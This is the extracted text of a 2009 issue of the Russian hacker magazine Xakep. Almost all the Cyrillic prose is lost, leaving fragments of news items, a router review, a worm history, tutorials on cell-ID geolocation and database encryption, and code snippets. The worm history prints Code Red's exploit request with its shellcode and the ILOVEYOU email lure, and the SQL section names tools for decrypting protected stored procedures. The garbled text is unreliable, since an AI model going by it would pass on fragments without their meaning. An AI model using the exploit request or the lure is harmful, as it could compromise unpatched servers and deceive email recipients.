
WORDPRESS

. 52

x 04()2009

w w w.xakep.ru
Code red

04 (124) 2009

PC27


WWW.GAMER-CITY.RU
. 4

Loveletter

10 / 1999-2009

Nimda

Melissa

J3

Slammer


1999-2009

6
Sasser

Storm

. 20

8
Warezov
PC27 adaptor
7
Mebroot
10
Sony rootkit

GPS
124

. 26


!



. 32


TWITTER

PYTHONE
. 88

Intro


1999 , ,
.
,

.
Downadup,
Windows-.
.
, -



10 .
nikitoz, . .
P.S. -
Gameland .
4.

CONTENT
04(124)
004 MEGANEWS

FERRUM

016

N Wi-Fi

Nimda

080
084

PC_ZONE

026
030
032

088


10

094

042
048
052

058
064
070

EASY HACK

WORDPRESS:


CISCO

102

110
115

The Pirate Bay


Win2k8:

FreeBSD Jail

120

127

-
BITTORRENT

IP-PBX Asterisk

124

072

SYN/ACK

106


Apple iPhone

IPHONE
-TOOLS

Twitter Pythone

098

038


Python CorePy


IP, GSM/UMTS Wi-Fi

10 -
GPS

,
UNIX-
Linux

Draft N Wi-Fi

020

128

(2009, VHSRIP)
][-

FAQ UNITED

FAQ

8,5

WWW2

web-

Mebroot

1C

020

CRYPTO

026

048

BID

032

Secunia

088

OSVDB

ISS X-Force

>
nikitozz
(nikitoz@real.xakep.ru)
>
gorl
(gorlum@real.xakep.ru)
>

Forb
(forb@real.xakep.ru)
PC_ZONE UNITS
step
(step@real.xakep.ru)
UNIXOID, SYN\ACK PSYCHO
Andrushock
(andrushock@real.xakep.ru)

Dr. Klouniz
(alexander@real.xakep.ru)

Dlinyj
(dlinyj@real.xakep.ru)
>

(lyashchenko@gameland.ru)

/DVD

>
Step
(step@real.xakep.ru)
> Unix-
Ant
>

(komarov@gameland.ru)
>

/ART

>-

(novikov.e@gameland.ru)
>

(svetlyh@gameland.ru)
>

/XAKEP.RU

>

(xa@real.xakep.ru)

/ .: (495) 935-7034, : (495) 780-8824


> GAMES & DIGITAL
(goryacheva@gameland.
ru)
>





>

>
( )
(strekneva@gameland.ru)
>

>


> -
(alekseeva@gameland.ru)

/PUBLISHING

>

(noah@gameland.ru)
>

>

(dmitri@gameland.ru)
>

(shostak@gameland.ru)
>

(romanovski@gameland.ru)
>

(stepanovm@gameland.ru)
>

(leonova@gameland.ru)
>

(ladyzhenskiy@gameland.ru)
>PR-

(litvinovskaya@gameland.ru)

>


(andrey@gameland.ru)
>

(kosheleva@gameland.ru )
>

(goncharova@gameland.ru)
.: (495) 935.70.34
: (495) 780.88.24

>
.: 8 (800) 200.3.999

>
101000, ,
, / 652,

,

77-11802 14
2002 .

Lietuvas Rivas, .
100 000 .
.

.
:

. ,

,
.
.


.
.
Gameland

, ,
Gameland TV.
,

content@gameland.ru.

>> meganews
J3

PC27

PC27

J3

MIFRILL / MIFRILL@R EAL.XAKEP.RU /


Samsung
Samsung
. 50 20, 21,5 23.
: 2
, , 5 ;
50.000:1; 300 /2.
: 1200900
19201080 . MagicBright3,
, :
, , , , ,
.
, ,

. - , 50 .
-,
.


(game)land

! 25 26


,
,

.
www.gamer-city.ru! !

. Xbox 360,

,
-, . ,
, .
,

004

APPLE, IPHONE
OS

30

.


. !
-
:


:
., . 153 , -153
. 2,
.2,
.7,

., .13,

F.E.A.R. 2: Project Origin(PC)


Call of Duty: World at War(PC)
GRID (PC)
Gears of War 2 (Xbox 360)
Mortal Kombat vs. DC Universe (Xbox 360)

www.gameland.ru
FAQ.
X 04 /124/ 09

>> meganews
PC27

PC27


. , , , , .
76.000 , ( ). , ,
, ,
, , .
,

,
. .
, , ,
, .
, ?..

e-ink
, ,
. ( ,
E-ink, ) FLEPia
Fujitsu Frontech Limited Fujitsu Laboratories Limited.
8" 7681024
260.000 .
8
, .
4096 5 ,
64 - 1.8 .
:
Windows CE5.0 , , Wi-Fi IEEE802.11b/g Bluetooth
Ver2.0+EDR, USB, SD- 4 .
, ,
2400 64- (
7000-9000 ).
$1015, .
, , .
FLEPia, :).

HP
,

,

006


HP.
- ,

.
, ,
,
,

DVD- CD-

.


, ,

5%.

,

.
HP
,
,
.


Gmail
,
e-mail,
? ,

-
... , ,
Send (
!). , ,
, .
, -

J3

Google .
Gmail
undo sent,
.


.
5 ,
.
,
, 5-
, , .

JIWIRE,

WI-FI .

, !

, , ,
.
Amazon.com
(,
, ).
,
. ,

,

, -,
- .

,

. Bristol
Bookbarn ,
.
,
, (

150 ). ,
,
.
Amazon.
com ,
-
.

IE 8.
Microsoft, -,

Internet Explorer 8.
19 , 20- :). PWN2OWN,
3Com, .
Nils,
IE7,

Windows 7
IE8
.

. Nils -

008

5000
Sony Vaio,
Microsoft
Security Research Center.
,
, IE8
.

(
Google Chrom), InPrivate

SmartScreen.

sci-fi
,

. , ,
,
, .

,
.
,
,
, ,
.


,


,
.
,
,
,
, ,

TED. ,
,
,
, .
,

.

PC27

,

CeBIT 2009 Gigabyte Technology
,
Touch Note M1028 Booktop M1022. 10.1
, ,
. , , 1024x600 1366x768
. , Wi-Fi,
Bluetooth Express Card.
. Booktop M1022 -,
.
, 10.1
, 3.5G,
HSDPA .


,


( !). ,
Ghost in the shell ,
-
.

, .

010

,
2 . ,

,

USB-.
,
2.0 .

PANDA SECURITY :

10 .

,
.

IBM + SUN = ?
The Wall Street Journal.
, , IBM
Sun Microsystems,
. , ,
, 6.5 . . ,
IBM
, , .

,
Windows


Phillips, OLED-.
Phillips
(OLED),

,
,
.
OLED ,

.
, ,
,

.
,
, .

012


, CeBIT 2009 . Asus
Asus-Lamborghini VX5,
Asus
Lamborghini Reventon. ,
.
Core2 Quad, 4
SSD- 1 . -, , Vx5 ,
.
16 Full-HD,
NVIDIA GeForce GT 130M 1 GDDR3 VRAM,
- Blu-ray.
, ,
TwinTurbo, ,
. ,
.

SECUNIA, FIREFOX

115 , 4

, .


, -, ,
Blu-ray ,
. , , , , 100 . . , , , Blu-ray -
.
DVD-, .avi. , Blu-ray
, .
1000 , , Blu-ray 1500 . ,
100 1 .

83%
.

, , .
.
, ,

,
, ,
.
Virtual Cocoon
.
.
( )
. , ;
HD-, 30
. , , , . ,
5 . ,
- , 1.500 .



Microsoft.
,
,
The Business Insider,
Microsoft
Office 14 .


.

, ,
.
,

Office 14,
.
2010 ,

.
,
Microsoft
.


LiveJournal
. ,

- Microsoft Hotmail,
. Hotmail

, LJ, e-mail ,
, ,
,
.
,
. ,
,

.

iPod Suffle
Apple
-
iPhone OS 3.0,
, iPod suffle 4 .

. iPod

,
, ,


.
iPod shuffle
,

. -


, ,
,
.
, ,
, iPod shuffle
.
iPhone . ,
,


Apple
Made for iPod,

suffle.
,


,

.
Apple ,
iPod shuffle 14
( ).

VoiceOver ,
, .

, . ,
,
$79.






,

, .
, ,

,
,
,
.
, Sophos

,
.

014


,
, .
,
, ,

Diebold .
,
,

.

, Diebold Agilis.
?
Eee

CeBIT

Eee Asus.
Eee Keyboard
PC,
CeBIT-PreView
Awards,

5 .
Keyboard PC

,
-
! Eee PC
T91
,

8.9. 0.96
5 ,
802.11b/g/n,
Bluetooth 3G plus, GPS
-.
Eee Eee
Top ET1602,

; Eee Box PC B206



HD;
Skype- Eee Videophone;
Eee Stick .
.

47%
ADFUSION
,
E-MAIL,
.

X 03 /123/ 09

015

>> ferrum

Draft N Wi-Fi
N

Draft N .

.
.

, WiFi-
.
, ,
. ,
TRENDnet .

WAN-. ,
,
PPTP/L2TP PPPoE.

, TCP/IP.

VPN-.
VPN-
. ,
.

016


:
1. NAT (

Static IP Dynamic IP WAN-).
, NAT
: WANLAN (
download), LANWAN (
upload) FDX (
).
2. PPTP.
- .
WAN- VPN-,
CPU , .
(PPPoE, PPTP L2TP) PPTP
; ,
.

3. Wi-Fi ASUS WL-100N, D-Link DWA645, TRENDnet TEW-624UB.


.
1 /.
WiFi-.

.

. ,
,
,
10 .
WPA-PSK-TKIP.

PPTP


:
ASUS WL-500W 1.9.8.2
ASUS RT-N15 1.0.1.7
D-Link DIR-615 2.25 B09
D-Link DIR-655 1.12 B04
NETGEAR WNDR3300 1.0.26
TRENDnet TEW-632BRP 1.10 B08
TRENDnet TEW-633GR 1.0.30

[Chart: routers TRENDnet TEW-633GR, TRENDnet TEW-632BRP, D-Link DIR-655, D-Link DIR-615, ASUS WL-500W, ASUS RT-N15; legend includes fdx; axis range 0 to 120.]

D-Link DIR-655 TRENDnet TEW-633GR


5700 .
5500 .

ASUS RT-N15
:
: 1xWAN (RJ-45) 10/100/1000 /, 4xLAN (RJ-45)
10/100/1000 /
Wi-Fi: IEEE 802.11 b/g + Draft N ( 300
/)
: 2,4 - 2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP/AES/TKIP+AES), WPS
: NAT/NAPT, DynDNS, Static Routing, DHCP
: SPI, Packet Filter, URL Filter, MAC Filter
: WAN Bridging

ASUS Draft N ,
, . RT-N15
ASUS.
, . WAN-
, ( NAS ). WAN-Bridging,
, IPTV .
, WAN-
. , CPU
, IGMP-proxy.
WPS,
Wi-Fi .

PPTP, ASUS RT-N15 ,


(ASUS WL-500W) 20 /.

ASUS WL-500W
:
: 1xWAN (RJ-45) 10/100 /, 4xLAN (RJ-45) 10/100
/
Wi-Fi: IEEE 802.11 b/g + Draft N ( 270
/)
: 2,4 - 2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP/AES/TKIP+AES)
: NAT/NAPT, DynDNS, Static Routing, DHCP
: SPI, Packet Filter, URL Filter, MAC Filter
: 2 USB 2.0 USB-,
..

ASUS WL-500W, Draft N .


ASUS WL-500GP.

open-source Linux, .
(
WAN-). WL-500W Draft N .
ASUS.
USB 2.0 , ,
web-.

. PPTP- , , 20 /. WL500W NAS ,


2 / , .

017

>> ferrum
[Charts: WI-FI (10, ) and WI-FI (1, ). Series: ap-pc, fdx, pc-ap. Routers: TRENDnet TEW-633GR, TRENDnet TEW-632BRP, D-Link DIR-655, D-Link DIR-615, ASUS WL-500W, ASUS RT-N15. Axis ranges: 0 to 120 and 0 to 80.]

Wi-Fi D-Link DIR655, TRENDnet TEW-633GR, ASUS

10 ASUS WL-500W,
D-Link TRENDnet

D-Link DIR-615

D-Link DIR-655

: 1xWAN (RJ-45) 10/100 /, 4xLAN (RJ-45) 10/100


/
Wi-Fi: IEEE 802.11 b/g + Draft N ( 300
/)
: 2,4 - 2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP/AES/TKIP+AES), WPS
: NAT/NAPT, DynDNS, DHCP, Traffic Shaping
: SPI, Packet Filter, URL Filter, MAC Filter, Access
Control
: IPv6 Ready

: 1xWAN (RJ-45) 10/100/1000 /, 4xLAN (RJ-45)


10/100/1000 /
Wi-Fi: IEEE 802.11 b/g + Draft N ( 300
/)
: 2,4 - 2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP/AES), WPS
: NAT/NAPT, DynDNS, DHCP, Static Routing, QoS Engine
: SPI, URL Filter, IP/MAC Filter, Access Control
:

2800 .

D-Link, Draft N .
IPv6. , IPv4 IPv6
, D-Link
! WAN- D-Link
DIR-615 . ,
(D-Link DIR-655), WAN-
VPN- .
IGMP Proxy, multicast
IPTV , .


L2TP- .

018

5100 .

,
. 1.12WW Build
04 WAN-. , D-Link DIR-655 . NAT
250 /, PPTP 90-100 /
. Wi-Fi .
90 /,
10 60 /. , IGMP-proxy, multicast- IPTV
.

PPTP .
L2TP-
.
[Charts: WI-FI (1, ) and WI-FI (10, ). Series: ap-pc, fdx, pc-ap. Routers: TRENDnet TEW-633GR, TRENDnet TEW-632BRP, D-Link DIR-655, D-Link DIR-615, ASUS WL-500W, ASUS RT-N15. Axis range: 0 to 1.4.]

D-Link
DIR-655 TRENDnet TEW-633GR,

2900 .

TRENDnet TEW-632BRP
:
: 1xWAN (RJ-45) 10/100 /, 4xLAN (RJ-45) 10/100
/
Wi-Fi: IEEE 802.11 b/g + Draft N ( 300
/)
: 2,4 - 2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP/AES), WPS
: NAT/NAPT, DynDNS, DHCP, Static Routing
: SPI, Packet Filtering, Domain/URL Filtering, MAC
Filtering
: WPS

TRENDnet TEW-632BRP
, D-Link DIR-615. , TRENDnet ,
WAN-. ,
, .
NAT
(WANLAN LANWAN) 100 /. WPS ,
WiFi-. WPS PIN-
web- .


10
D-Link DIR-655 TRENDnet TEW-633GR

6000 .

TRENDnet TEW-633GR
:
: 1xWAN (RJ-45) 10/100/1000 /, 4xLAN (RJ-45)
10/100/1000 /
Wi-Fi: IEEE 802.11 b/g + Draft N ( 300
/)
: 2,4 - 2,5
: WEP ( 128 ), WPA/WPA-PSK, WPA2/WPA2-PSK
(TKIP/AES), WPS
: NAT/NAPT, DynDNS, DHCP, Static Routing, Traffic
Shaping
: SPI, Packet Filtering, Domain/URL Filtering, MAC
Filtering
: StreamEngine, WPS

TEW-633GR Draft N
TRENDnet. (
WAN-) ,
NAT ( 300 /). , 100 /.

NAS-. PPTP-
. TRENDnet TEW-633GR D-Link DIR-655. WPS, WiFi-
.

,
WAN-. TRENDnet
PPTP- 10 /.
-. , .

, .
, -
2000 , 3000.

.
TRENDnet TEW-632BRP /
.
D-Link DIR-655, Wi-Fi Draft N
. z

019

>> pc_zone
3
Code red

Loveletter

/ STEP@GAMELAND. RU/

1
Melissa

J3

Slammer

6
Sasser

Nimda

9
Storm

Mebroot
8
Warezov

10

Sony rootkit

10
.
.
-, , .
10 .

Melissa
Loveletter
MELISSA 100

1999


- ,
.
, , ,
Melissa.
26 alt.sex Usenet

.
List.DOC, 80
: , .
-:
, 50
.
, e-mail.

2000


, Love Letter ( Love
Bug). ,
ILOVEYOU , .
,
Visual Basic
Script, .

Melissa

Loveletter

The Subject: ILOVEYOU


Message body: kindly check the
attached LOVELETTER coming from me.
Attached file: LOVE-LETTER-FORYOU.TXT.vbs

,
.
, , ,

.
, .

ILOVEYOU

Melissa MS Word 97/2000, ,



Outlook. Visual Basic
MS Windows
. MS Outlook, 50 email
.
,
,
, .
, ,
,
.
1999 , -


Windows Scripting Host,

MS
Outlook, ,
.

Internet Explorer. ,

.

. , WIN-BUGSFIX.EXE
Microsoftv25.exe
.

.
,
, .vbs. rulez.mp3,
rulez.mp3.vbs
.

- ,
.


, .

. 27
; 29

, ,
.
,

VB, 10 ,
, 20
$5000.
,
Melissa.

,
,
mIRC

IRC-. HTML-,
ActiveX-. , ,
: ,
, .
Love Letter 4 2000 .,

, NASA, , , ,
. ,
,
$5 . ?
: barok -loveletter(vbe)
< i hate go to school > by: spyder / ispyder@mail.
com / Manila,Philippines.
,
.

021

>> pc_zone
CODE RED

SLAMMER

Code Red
Slammer
2001

-
2002
IP- :). 13 2001 , Code Red IIS
. ,
, Microsoft
, . ,
13 6
350 .
ISS
. Code
Red
,
. Code
Red IIS -,
HTTP- IP- ,
- 80- IIS.
.

Code Red

2002


2001

, , .
,
. Nimda
,

.
.
1.
,
Internet Explore,
. README.EXE (,
, ++)
,
.

Nimda

022

, GET-,
.
Apache, , ,
IIS , :
GET /default.ida?NNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNN%u9090%u685
8%ucbd3%u7801%u9090%u6858%ucbd3%u7
801%u9090%u6858%ucbd3%u7801%u9090%
u9090%u8190%u00c3%u0003%u8b00%u531
b%u53ff%u0078%u0000%u00=a HTTP/1.0

Code Red
. :
,
TCP/IP-
.
.

,

,
MAPI-
Microsoft Exchange.
2. .
Nimda
, .EML .NWS. ,
,
.
3. IIS,

. Nimda
-
directory traversal. -
,

Code Red, .

: HELLO!
Welcome to http://www.worm.com! Hacked By
Chinese!,
,
. , , : ,
.
20 28
DoS-
IP-,
.
Code Red II, , ,

,
cmd.exe \inetpub\scripts\ ISS-. Code Red,


.

.
4. Nimda

, Code
Red II sadmind/IIS.
, Nimda
, .
Guest . ,
.
,
.
,
, ,
: Concept Virus(CV) V.5,
Copyright(C)2001 R.P.China

Sasser

email

DESKTOP
COMPUTER

email c

WEB
SERVER

IIS
Code Red

DESKTOP
COMPUTER

IIS
Code Red

WEB
SERVER

DESKTOP
COMPUTER
OR FILE
SERVER

NIMDA

Nimda

SASSER

2003


, 25
.
,
.

Slammer.
12:30
, 12:33
8.5 .
Microsoft
SQL Server, David Litchfield BlackHat.
1434

,
, ,
.
, 75.000 - ,
? IIS,

,
UDP, ,
376 , UDP-. Slammer
TCP,
-, UDP
!
,
6 ,

, Slammer . ,

.


24 . :
27
. , , , SQL.

2004

-,
System Shutdown, NT AUTHORITY\SYSTEM

, Blaster,
2004,
Sasser.
, .
Sasser Local Security Authority
Subsystem Service (LSAS)
. ++ Sasser 128 , ,

IP-,
445
.
, ,
. Sasser 9997
,
.

FTP,
5554 .
, - , Sasser

,
.
Sasser -

,
, .
,
.
,

.
18- ,
.
- ,
Microsoft
250.000 . Sasser,
Netsky.

Slammer

Sasser

Sony rootkit

BSOD - SONY ROOTKIT

Warezov

WAREZOV

2005
2006
2007

. ,
,
. $sys$aries
(aries.sys) , $sys$
API-. Win32/
Rootkit.XCP System
Service Table (SST)
: NtCreateFile, NtEnumerateKey,
NtOpenKey, NtQueryDirectoryFile,
NtQuerySystemInformation. , ,
.
: , , ? ,
-

, ? .
,

. :
,
, .
, -
,
-
, .
, Sony
,
.

2006 ,

-
,
. ?
Warezov ( Stration),
,
email.
, . :
.
Warezov
, ,
. ,
30
.

.
, - ,
IM-. Warezov
,
Skype!
, Warezov

.
URL- (, , ),
. -
,
. Warezov
,

.
SMTP-. , ,
. fast-flux ,

IP- . IP
,
. Warezov
: -, reverse HTTP proxy, () , DNS-,
Bind Windows
.

,
Storm,
. P2P-,
. IP- ( fast-flux
domains). .

. ?

19
2008 , ,

,

Full Clip.exe, Full Story.exe, Read
More.exe Video.exe.
,
,
,
. Storm ,

(
30-45 ),

. .
,
,
. ,
.
, Storm
: Win32.agent.
dh,

,
DDoS-.

:
,
! Win32/
Rootkit.XCP, sony rootkit,
-CD, Sony
BMG.
DRM-
(Digital Rights Management),
First 4 Internet, . ,

,
-

Sony rootkit

Warezov

Storm

MEBROOT

FAST-FLUX


DOWNADUP

Merboot

COMPROMISED
PCs
,

NS.SUPERSAMEAS.COM

STORM BOTNET
211.51.164.123

Downadup

HOME
PC

QUERY:
WWW.SUPERSAMEAS.COM

3
HTTP GET:211.51.164.123

Storm

2008

,
, . 2005
Black Hat
eEye Digital Security ,

,
Windows
. , 2008
,

2009

,
, -: Downadup, Conficker, Kido. :

,
.
,
.
,

MS08-067
( ).

RPC,
wcscpy_s

Merboot

Downadup


MS08-067

,

ADMIN$

, Mebroot.
2005
-
,
, .
:
.
MBR ( ),
- ,

netapi32.dll. -,

.
,
,

ADMIN$. : Autorun.inf
(
) . =
!
,
(
, DDoS ..).


MS08-067,

WINDOWS

Windows, .
, MBR
, ,
. ,
,
API- MBR.

,
Windows ,
.


-
.
250
, .


.
, .
API-, DNS,
,
, , kaspersky, nod, symantec,
microsoft .. z

025

>> pc_zone


/ STEP@GAMELAND. RU/

GPS
IP, GSM/UMTS Wi-Fi
, GPS, .
,
, . ,

.
, GPS , ,
? .

. ?
, :
1. IP
, , .
2.
GSM/UMTS. .
3.
Wi-Fi, .
, .

IP
IP, ,
, VPN ,
ip2location.com. , , IP-,
, (, ,
), . ,
-.
, ,
, IP. ,
, (, hotspot
),
, . ,
, . ,

026

, .
,
IP-, WiFi-,
.
,
ip2location.com, .
, ,
, .
IP- ,
ip2location
. ,
, : .cvs () .bin
().
. , IP-
, PHP-
IP- :
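// Convert a dotted-quad IPv4 address to its 32-bit integer value
function Dot2LongIP ($IPaddr)
{
    if ($IPaddr == "") {
        return 0;
    } else {
        // split() was removed in PHP 7; explode() does the same job for a literal "."
        $ips = explode(".", $IPaddr);
        return ($ips[3] + $ips[2] * 256 + $ips[1] * 256 * 256
            + $ips[0] * 256 * 256 * 256);
    }
}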

,

ip2location

MNC, MCC, LAC, Cell ID


,
IP-? ! :)

.
BIN-, . Perl, C, Python, PHP, Ruby,
C#, VB.NET, Java, Visual Basic
(http://www.ip2location.com/developers.aspx), . PHP
IP2Location.inc.php :
<?php
include("IP2Location.inc.php");
$ip = IP2Location_open("samples/IP-COUNTRY-SAMPLE.BIN", IP2LOCATION_STANDARD);
$record = IP2Location_get_all($ip, "_IP-_");
// Labels are single-quoted so they print literally; double quotes would interpolate the value
echo '$record->country_long : ' . $record->country_long;
echo '$record->city : ' . $record->city;
echo '$record->isp : ' . $record->isp;
echo '$record->latitude : ' . $record->latitude;
echo '$record->longitude : ' . $record->longitude;
IP2Location_close($ip);
?>

,
Google Maps, :
http://maps.google.com/maps?f=l&hl=en&q='+query+'&near='+str(lat)+','+str(lng)+'&ie=UTF8&z=12&om=1

!
,
,
. ,
Google Maps (www.google.com/gmm).
, -,
,
. ,
maps.google.com .
(
Opera Mini) , Google, , .
,
Java, Windows
Mobile Symbian S60 3rd Edition, BlackBerry,
Android, , . iPhone Google
Maps . ,
,
.
. , GPS :
! ,

,
! , .
,
, . ,
. ,
.
CellID ( CID)
, . , , , ,
.
, , .
, ,
,
. Google Maps , .
?
, .
, , ( , ,
). , ,
, :).
, , ,
. !
Google
Google Maps,
GPS. :
, (
) ,
. .

GSM-

,
Google ? , ,
,
? , !
Google Maps, API, , . http- , ,
http://www.google.com/
glm/mmap, ,
.

027

>> pc_zone

links

Google
Maps: mapki.com/
wiki/Google_Map_
Parameters.
GPS-

:
tinkerlog.com/2007/
07/13/interfacing-anavr-controller-to-agps-mobile-phone.


Yahoo:
developer.yahoo.
com/yrb/zonetag/
locatecell.html.


Google Maps.
PHP: http://www.
witracks.com.br/
gmaps.txt.
j2me: http://www.
mapnav.spb.ru/site/
e107_plugins/forum/
forum_viewtopic.
php?9736.
Python S60:
http://blog.jebu.
net/2008/07/googlecell-tower-mappingwith-python-on-s60.
C#: http://maps.
alphadex.de/datafiles/
fct0e1b11782832f02.
cs.
Delphi: http://
forum.netmonitor.ru/
about4470-0-asc-60.
html.

dvd

,


.

028

Google

NetMonitor Symbian

Wi-Fi:


: MCC, MNC, LAC CellID.
MCC ( 250)
MNC ( 01, 02,
99 ..)
LAC ( ,
,
)
CellID (CID) ,

, ,
!
Google Maps ,
,
myl:MCC:MNC:LAC:CellID.
netmonitor:
, ( ),
.
,
.
, ,
.
Python,
Skvo forum.netmonitor.ru:
net, cid, lac = 25002, 9164, 4000
import urllib
# Fixed request header, followed by CellID and LAC, then MNC and MCC, each as 8 hex digits
a = '000E00000000000000000000000000001B0000000000000000000000030000'
b = hex(cid)[2:].zfill(8) + hex(lac)[2:].zfill(8)
c = hex(divmod(net,100)[1])[2:].zfill(8) + hex(divmod(net,100)[0])[2:].zfill(8)
string = (a + b + c + 'FFFFFFFF00000000').decode('hex')
try:
    data = urllib.urlopen('http://www.google.com/glm/mmap', string)
    r = data.read().encode('hex')
    if len(r) > 14:
        # Latitude and longitude are returned as integers scaled by 10^6
        print float(int(r[14:22],16))/1000000, float(int(r[22:30],16))/1000000
    else:
        print 'no data in google'
except:
    print 'connect error'

, ,
Python ( 2- , 3-
), http://python.
org/download/releases. ,
, NET (MCC
MNC, ), CID, LAC.
http://www.google.com/
glm/mmap .
, , , 59.200274 39.836925.
: no data in google.
, , NET LAC
CID ( 1 65536), , ,
, .
,
GUI-, C# (
).
, Google
Maps.
. ,
,
LAC CellID. MCC/MNC
,
LAC, CellID.

,
. .
; ,
100
, !
, .
, , .
, Google,
Cell ID, LAC, NET :
http://mobile.maps.yandex.net/cellid_location/?&cellid=%d&operatorid=%d&countrycode=%d&lac=%d

,
XML-, .

Google,


Google Maps,
, , . , , -
, ,
. , ,
:
. ,
. :
1. ;
2. , ;
3. NMEA,
GPS-, .
VirtualGPS (www.kamlex.com),
Windows Mobile 2003, WM
5, WM 6, WM 6.1. lite-
GPS.
,
, ,
, GPS-.


Google Maps

, - SKYHOOK
.
, Wi2Geo (wi2geo.ru),
- Wi2Go :). Windows Mobile, Symbian, Windows Mac OS
X, IP-,
GSM , , Wi-Fi. , API (http://labs.
wi2geo.ru/basicapi.php). ,
, Wi-Fi.
.

?
WI-FI
, WiFi-
, , , . , :). :
,
MAC- ( SSID)
.
.
, Wi-Fi ,
, , . WPS (Wi-Fi Positioning System) SKYHOOK Wireless (www.skyhookwireless.com),

. , , API-, . Firefox Geode (http://
labs.mozilla.com/geode_welcome),
- (
, ).

NetMonitor
,
, , . ,
,
!
Symbian: FieldTest, CellTrack, Best GSMNavigator
Windows Mobile 2005: GPS Cell
Windows Mobile 5.0/6.0: NetMonitor32, WMCellCatcher,
CellProfileSwitcher (,
-)

,
.
,
. , ,
. Google
Google Latitude, Google Maps. ,
,
?
. http://forum.xda-developers.com/
showthread.php?t=340667 , WM, -.
Google
Earth. ,
! z



.
, . celldb.org/aboutapi.
php, www.opencellid.org/api, http://gsmloc.org/code, cellid.telin.
nl. API
HTTP-,
MCC, MNC, Cell ID LAC.
Netmonitor.ru,
, ,
, 2 Skylink. ,
.

029

>> pc_zone
1) :
152

155

157

160 163

165

168

170

173 175

178 180

183

185

188 191


50-75 c.

178 c.

166 .

124 .

100 - 200

109 .

67 .

44 .

2)




.


/ VITYA31@MAIL.RU/


, .

>> pc_zone

18 ,
, ! .
, ? IT
,

.
,
,
Windows, .

030


,
, ,
,
. ,
.
,
,

. , ? Workrave (http://
www.workrave.org/welcome),
, !

.
, ,
. ,
, .


. ,

(). 10-
( ).
.

, , . ,
.
, ,
, ,
.
.
: ,
,
. , ,
, . Workrave ! ,
.

.
: , :).
, ,

, : .
( ,
)
.


.
,
. ,
,
.
- Workspace
Planner (internalapps.ergotron.com/MirWebTool/
ergoTool_metric.html)
, .
1988 ,
. :
,
(, ,
?), .
:

,
.

Workrave


, ,

.
, , ,
,
. , , , ? , !
,

.
, .
- . -: ,
- ,
.
f.lux (www.stereopsis.com/flux).

.
,
.
: !
, ,

( ).
, ,
. f.lux ,

: .
Google,

.
Windows, Linux Mac OS X.
.
40-50 .
,
. ,
,
, .
: EyesKeeper (www.
gi.ru/eyeskeeper) .
,
.
. , ,
-
, .
:). z

021

>> pc_zone


1C

CRYPTO

1C

CRYPTO

/ KOMAROV@ITDEFENCE.RU /

>> pc_zone

, . ,
, .
. , .
, .
. ,
,
. ?
,

032

.
,
.
,

. , . ,
, : ,
.
,

. 1,

( ,
XOR ),
. ,
,
.
,
.
,

. ,

!

DES_ENCRYPT(),
MySQL .
, :
INSERT INTO t VALUES (1,AES_ENCRYPT('text','password'));

, .
SQL- ,

. ,
AES_DECRYPT(AES_ENCRYPT())
unhex(hex()).

!
:

, ,
.
,

, ! , :). Spelabs
(spellabs.ru/spellabsCrypto1C.htm) -
,
1 ,
.
, ,
. , .
,
!
, , ,
,
.
MySQL
14 ,
:
AES_ENCRYPT() AES
AES_DECRYPT() AES
COMPRESS()

DES_ENCRYPT() DES
DES_DECRYPT() DES
ENCODE()

(
plaintext )
DECODE()
,
ENCODE()
ENCRYPT()

Unix crypt
MD5()
MD-5
SHA1(), SHA() SHA-1 (160)

SQL-, AES_ENCRYPT()

T-SQL
,

(
), .

().
,
. ,

.
Microsoft
SQL Server,
.
T-SQL,
SQL.
,
.
EncryptByCert(),
. .
? .
, andrej Bank
:
USE Bank;
CREATE CERTIFICATE andrej
    ENCRYPTION BY PASSWORD = 'pGFD4bb925DGvbd2439587y'
    --
    -- FROM FILE = 'c:\Shipping\Certs\Shipping11.cer'
    -- WITH PRIVATE KEY (FILE = 'c:\Shipping\Certs\Shipping11.pvk',
    WITH SUBJECT = 'Employers Access',
    EXPIRY_DATE = '10/31/2009';
GO

,
SQL-:
INSERT INTO [].[]
values( N' ', EncryptByCert(Cert_ID('andrej'), @cleartext) );
GO


@cleartext andrej.
.
,
( ,
).
: DecryptByCert().
,
. , , ,
(passphrase).
,

. , .
, .

:
SELECT convert(nvarchar(max),
    DecryptByCert(Cert_Id('andrej'), ProtectedData, N'pGFD4bb925DGvbd2439587y'))
FROM [].[]
WHERE Description = N'Employers Access';
GO

[].[],
Employers Access.

Andrej pGFD4bb925DGvbd2439587y.

varbinary nvarchar.
, ,

.


, ,
.
,
, .

!
,
,

033

>> pc_zone

info


:
,

;


,

(
),


;




.
,




MSSQL 2008 ( Enterprise).

TDE (Transparant
Database Encryption).

. , ,
,

. ,
,

, .

.
SQL Shield (www.sql-shield.com).
/*sqlshield*/ WITH
ENCRYPTION ,
. ,
:

CREATE PROCEDURE MyTest


WITH /*sqlshield*/ ENCRYPTION
AS
SELECT 2+2

:
MyTest
> 4

, ,
.
SQL Server Syscomments Decryptor (www.
geocities.com/d0mn4r/dSQLSRVD.html),

. !


- .
, :

warning

SQL Server


ANSI_PADDING
OFF
-
!

034

ID    LastName   FirstName   Emp              Sum
354   Somov      Oleg        IT-Manager       M0x8900f56543
643   Antipova   Alexandra   Director         4343Lax#dsdsss
411   Timurov    Valeriy     Technical Dep.   0x2322322222

, .
, .
, . ,
. , ,
, , . ,
. : , , .


- SQL 2005

?
XP_CRYPT (xpcrypt.com).
,
. ,
, ,
( ,
),

GUI-.

. , -

SQL Server ( , , ) WITH ENCRYPTION. ,


, . Microsoft. ,
! , , :
1) SQL Server GUID , ,
colid syscomments ( , 1 2)
;
2) SHA;
3)
RSA. ,
;
4)
XOR. , ctext
syscomments.
:
(GUID colid)
. , ,
dSQLSRVD. , GUID (
) ;
,
, (
). .
SQL Server? :
dSQLSRVD. ;
DECRYPT2K.
( ),
, Google.

XP_Crypt ,

-, -
( ,
!).
, .. ,
..
, SELECT * FROM
tbl_CCards, :
Username   Password   CredCardNum
james      god        1234567890123456
lucas      sex        2894787650102827
anna       love       3234563638716434

